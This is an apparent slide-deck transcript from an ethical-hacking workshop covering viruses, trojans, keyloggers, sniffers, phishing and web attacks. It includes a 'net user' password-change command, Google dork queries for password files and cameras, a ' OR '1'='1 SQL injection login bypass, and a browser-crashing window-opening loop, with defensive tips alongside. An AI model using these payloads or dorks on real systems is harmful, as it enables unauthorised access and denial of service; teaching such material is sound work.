Information security & ethical hacking
-
Upload
eiti-panchkula -
Category
Education
-
view
72 -
download
1
Transcript of Information security & ethical hacking
![Page 1: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/1.jpg)
INFORMATION SECURITY & ETHICAL HACKING
How secure are you……?
![Page 2: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/2.jpg)
Agenda
• Network’s Exposure to Security Threats
• What is Information Security And Ethical Hacking
• Two Major Aspects - Desktop & Internet Security
• Live Demonstrations of Attacks
![Page 3: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/3.jpg)
“By the end of 2013, 95% of enterprises will be infected with undetected, financially motivated, targeted threats that evaded their traditional perimeter and host defenses”- By Gartner, Top Ten Key Predictions, 2012
security predictions in 2012
Network’s Exposures To Threats
![Page 4: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/4.jpg)
Two Major Aspects Of Security
Desktop and internet security
![Page 5: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/5.jpg)
SAM = Security Account Manager
• The Passwords are stored in SAM fileCracking Tools :ERD CommanderPH Crack
and many more…
Cracking Login Password
![Page 6: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/6.jpg)
That’s easy… but admin rights… hm…
OR we can Change the Password…
C:\> net user username password
You need the admin rights !
But you can change Passwords of Other Admin Users !
![Page 7: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/7.jpg)
The three major threats to computer world…!!
Virus & Worms
Keylogger
Trojan Horse
![Page 8: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/8.jpg)
Today almost 87% of all viruses/worms are spread through the Internet.
Symptoms
• The system might start hanging.
• Softwares and applications often starts crashing
• System may become unpredictable.
• In some extreme cases OS may also crash.
AND
• Worms… These generally don’t perform any malicious activity.
• They reside in the system and make copies of itself
• These eat up the system resources
![Page 9: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/9.jpg)
Lets Code a Virus ! !Is it difficult ?
![Page 10: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/10.jpg)
Trojan Horse
Trojan… is a fatal gift !
A Trojan is an infection that steals information.
It then sends the information to a specified location over the internet.
It makes the computer prone to hackers by making Backdoors.
Attacker Victim
![Page 11: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/11.jpg)
KEYLOGGER
They log all the keys that you type.
This runs in the background and is totally invisible.
Trojans often have the keyloggers with them and they mail the log to their masters.
Watch your key strokes…!
![Page 12: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/12.jpg)
Windows Registry
Know how change in registries effects your system……!
All initialization and configuration information used by windows are stored in the registry.
![Page 13: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/13.jpg)
Network Scanners
Network Scanners used to find all the live systems present in the network with the Information about IP Address, Port Number, Services running on that ports, Vulnerabilities, installed applications etc.
Some Tools:-
Angry IP ScannerGFI LAN GuardLook At LAN
Finding live Hosts…!
![Page 14: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/14.jpg)
Sniffers
Sniffers used to Capture the data packet from the network by applying some Poisoning such as ARP Poisoning.
Some Tools:-
Cain and abelEttercap
hmmmmmmmmmm…!
![Page 15: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/15.jpg)
Cryptography
Art of Secret writing to convert plaintext(Readable format) into cipher text(Non-Readable format) by using some algorithms with the help of a Key.
Encrypters…!
![Page 16: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/16.jpg)
Stagenography
Art of Secret writing to Hide one file behind the other file. Example a text message can be bind behind the image or video file.
Hiding……..
![Page 17: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/17.jpg)
•Use Antiviruses with Updated Signatures
•Use Firewalls
•Do not open Untrusted executables
•Use Cryptography Techniques
How Do I Protect My Data ?
I will mess it up…!
![Page 18: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/18.jpg)
World Wide Web…
Lets move to internet…
![Page 19: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/19.jpg)
Web Developer’s Nightmare
Website Exploits…
GoogleHacking
SQL Injection
DOS Attack
DNS Spoofing
Remote System Scanning
![Page 20: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/20.jpg)
Google CrackingUsing Google
Google is more than just a Search Engine. Special keywords can perform better Searches.
Google crawls the web …!
<Google Commands>site, intitle, filetype, allintitle, inurl
![Page 21: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/21.jpg)
Database Cracking
Hmmmmmmmmmmm…..
![Page 22: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/22.jpg)
Filetype:xls hry.nic.in
Advance Googling
![Page 23: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/23.jpg)
Intitle:index .of master.passwd
Password Cracking
![Page 24: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/24.jpg)
Camera Cracking
Inurl:indexframe.shtml axis
![Page 25: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/25.jpg)
Lets see how is this done…!
Lets see how a simple SQL injection works…
' OR '1'='1
● ● ● ● ● ● ● ● ● ● ●
Select * from table where user= ‘ " & TextBox1.Text & “ ’ AND pass= '" & TextBox2.Text & “’;
Backend SQL string
Select * from table where user= ‘ ‘ OR ‘1’=‘1 ’ AND pass= ‘ ‘ OR ‘1’=‘1 ’;
String after SQL Injection
user= ‘ ‘ OR ‘1’=‘1 ’ AND pass= ‘ ‘ OR ‘1’=‘1 ’;
We Know that… is always True…!
SQL attack…
![Page 26: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/26.jpg)
Uptu vice chancellor desk….
![Page 27: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/27.jpg)
Jetking Super Admin Section…..
![Page 28: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/28.jpg)
Phishing
Fake Emails
Dangers for Internet Users…
Surfing Online…
Social Networking
Abuse
Browser Hacking
![Page 29: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/29.jpg)
Browser Cracking
Lets Do It.........
• Use scripts links to run in Browser.
• These scripts change the behavior of Browser.
• Example:
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin (R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0)
javascript:b=[]; a=document.images; for(wt=0; wt<a.length; wt++){a[wt].style.position='relative'; b[b.length]=a[wt]}; j=0; setInterval('j++; for(wt=0; wt<b.length; wt++){b[wt].style.left=Math.sin((6.28/a.length)*wt+j/10)*10}; void(0)',1); void(0);
![Page 30: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/30.jpg)
Blast Virus
Lets Do It.........
<html>
<body>
<script language="javascript">
while(1)
{
w1=window.open();
w1.document.write("<center><font color=red size=5> blaaaast!!</font></center>");
}
</script>
</body>
</html>
![Page 31: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/31.jpg)
Lets Send a Fake Email !
Fake EmailsSending Fake mails with Fake
headersE-mails can be sent to anyone from any Id
It is used also in Spamming
Its [email protected] ...
![Page 32: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/32.jpg)
How to Catch Fake Emailers
Analyze the headersUse sites like
“ whatismyipaddress.com ” to trace the IP address of fake mail
Go to “Regional Internet Registries” like Apnic, Afrinic, etc.
Get the email of ISP of attacker & lodge the complaint.
Catch me if u can…
![Page 33: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/33.jpg)
Password?
E-mail: “There’s a problem with your Gmail account”
User thinks it’s Gmail.com
(But its
Gmail.org)
Password sent
Phishing Attack
Lets make a fake page…
![Page 34: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/34.jpg)
Preventing Phishing
Read the URL carefully…
Keep a suspicious eye over info demanding E-mails.
Anti-phishing Tools can be effective…
Use your Brain…
![Page 35: Information security & ethical hacking](https://reader031.fdocuments.us/reader031/viewer/2022032300/55cc11c4bb61eb7b648b47cd/html5/thumbnails/35.jpg)
This is just a Trailer movie is about to Begin…
Thank YouFor any query and assistance,
Kindly contact:
Appin Technology lab